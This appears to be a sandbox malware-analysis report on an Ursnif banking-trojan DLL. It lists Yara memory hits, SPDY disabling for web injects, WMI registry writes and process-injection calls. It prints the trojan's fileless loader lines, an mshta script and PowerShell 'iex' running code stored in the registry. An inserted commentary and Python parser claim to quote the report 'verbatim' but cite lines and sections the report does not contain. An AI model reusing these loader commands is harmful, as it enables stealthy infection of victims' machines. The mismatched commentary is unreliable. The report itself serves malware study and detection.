                      Source: Yara matchFile source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
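
The Yara sources above encode where the payload lives. Memory dumps are named <process index>.<kind>.<id>.<base address>.<flags>.<flags>.sdmp with a hex process index (so 00000027 is explorer.exe, as the string-hit lines earlier confirm), and carved PEs are named <index>.<kind>.<image>.<address>.<n>[.raw].unpack. Read together they show each carved image sitting a few KiB inside a dumped region (0x13494a0 in the 0x1349000 dump of loaddll32.exe, 0x300a309 in the 0x3000000 dump of rundll32.exe) and that explorer.exe holds the payload only as injected memory at 0x102CC000, with nothing carved from it. The Python below is an added example for this page, not a Joe Sandbox tool; it parses a copied subset of these lines and makes that correlation explicit. The 64 KiB window used to attribute a carved PE to a dump is an assumption, since the report states no region sizes, and the two trailing flag fields are left uninterpreted.

```python
"""Correlate the Yara hits in this report: which process regions hold the Ursnif payload,
which carved PE came out of which dumped region, and which processes carry the payload
only as injected memory."""
import re
from collections import defaultdict

# Memory dump names: <process index>.<kind>.<dump id>.<base address>.<flags>.<flags>.sdmp,
# process index and base address in hex. The two trailing flag fields are not interpreted.
DUMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]+\.([0-9A-Fa-f]{16})"
    r"\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.sdmp$")
# Carved PE names: <process index>.<kind>.<image>.<address>.<n>[.raw].unpack, address in hex.
UNPACK_RE = re.compile(r"^(\d+)\.\d\.(.+?\.exe)\.([0-9a-f]+)\.\d+(?:\.raw)?\.unpack$")
SOURCE_RE = re.compile(r"source: (\S+), type: (MEMORY|UNPACKEDPE)$")

# A subset of the report's Yara match lines, copied verbatim.
SAMPLE_LINES = """
Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
""".strip().splitlines()


def parse_sources(lines):
    """Return (dumps, carved, names): process index -> dump bases, process index ->
    carved PE addresses, process index -> image name (only carved entries carry one)."""
    dumps, carved, names = defaultdict(set), defaultdict(set), {}
    for line in lines:
        m = SOURCE_RE.search(line.rstrip())
        if not m:
            continue  # MEMORYSTR entries name a PID, not a region, and are skipped
        src, kind = m.groups()
        if kind == "MEMORY" and (d := DUMP_RE.match(src)):
            dumps[int(d.group(1), 16)].add(int(d.group(2), 16))
        elif kind == "UNPACKEDPE" and (u := UNPACK_RE.match(src)):
            idx = int(u.group(1))
            carved[idx].add(int(u.group(3), 16))
            names[idx] = u.group(2)
    return dumps, carved, names


def containing_dump(dumps, idx, addr, max_offset=0x10000):
    """Base of the dumped region of process idx that most plausibly contains addr.
    The report gives no region sizes, so a 64 KiB window is assumed: a carved PE at
    0x13494a0 is attributed to the dump at 0x1349000, while the DLL image at 0xb00000
    has no dump within the window and yields None."""
    cands = [b for b in dumps.get(idx, ()) if 0 <= addr - b <= max_offset]
    return max(cands) if cands else None


def carved_origin(lines):
    """Map every carved PE (process index, address) to the dump it was carved from."""
    dumps, carved, _ = parse_sources(lines)
    return {(i, a): containing_dump(dumps, i, a) for i in carved for a in carved[i]}


def injected_only(lines):
    """Process indices whose memory matched Yara but from which nothing was carved;
    these are the injection targets to pull dumps from by hand."""
    dumps, carved, _ = parse_sources(lines)
    return set(dumps) - set(carved)


if __name__ == "__main__":
    for (idx, addr), base in sorted(carved_origin(SAMPLE_LINES).items()):
        print(f"proc {idx:#x} carved {addr:#x} from dump {base:#x}" if base
              else f"proc {idx:#x} carved {addr:#x}: no matching dump")
    print("injected only:", [hex(i) for i in injected_only(SAMPLE_LINES)])
```

The recurring offsets (0xa309 and 0x4a0 above the dump base in every process) are the same unpacked image landing at the same position inside each allocation, which is itself a useful hint that one injector placed it in all of them.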

                      E-Banking Fraud:

Yara detected Ursnif
Source: Yara match, file sources: the same 54 memory dumps, process memory spaces and unpacked PEs listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above.
Disables SPDY (turns off SPDY/3 support in Internet Explorer, a multiplexing precursor of HTTP/2, not a compression scheme; with it off the browser falls back to HTTP/1.1 framing that the bot's in-browser hooks can read and rewrite to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

                      System Summary:

Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: uT9rwkGATJ.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A21B4
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B04C40
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B0AF24
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B02B76
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00670C49
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00670CBE
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5348B
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B51C14
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B571AA
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B561D5
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B68D77
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B59F02
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5135C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00570CBE
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00570C49
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02DA0CBE
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02DA0C49
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03349F02
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334135C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334EBA2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03358D77
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033471AA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033461D5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03341C14
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334348B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BD4C40
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BDAF24
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BD2B76
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00840CBE
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00840C49
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B094E8 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B09269 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B05D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B0B149 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6F02A NtQueryInformationProcess,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5D5B8 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B645D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B60DD9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B665CE RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6D103 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5CC12 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B7186D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5B9B9 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6E9C2 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B662DC NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5979A memset,NtQueryInformationProcess,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B56F3E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B76B6A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335420A GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335D103 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334D5B8 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033545D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03350DD9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033565CE RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335F02A NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03346F3E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03366B6A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334979A memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033562DC NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334B9B9 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335E9C2 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334CC12 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03360C0C NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0336186D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BD5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BDB149 NtQueryVirtualMemory,
                      Source: hiiw3gsl.dll.31.dr Static PE information: No import functions for PE file found
                      Source: uio4qdnj.dll.29.dr Static PE information: No import functions for PE file found
                      Source: ebytp2em.dll.35.dr Static PE information: No import functions for PE file found
                      Source: hjljqxud.dll.32.dr Static PE information: No import functions for PE file found
                      Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\loaddll32.exe Section loaded: mspdb140.dll
                      Source: uT9rwkGATJ.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
                      Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
                      Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
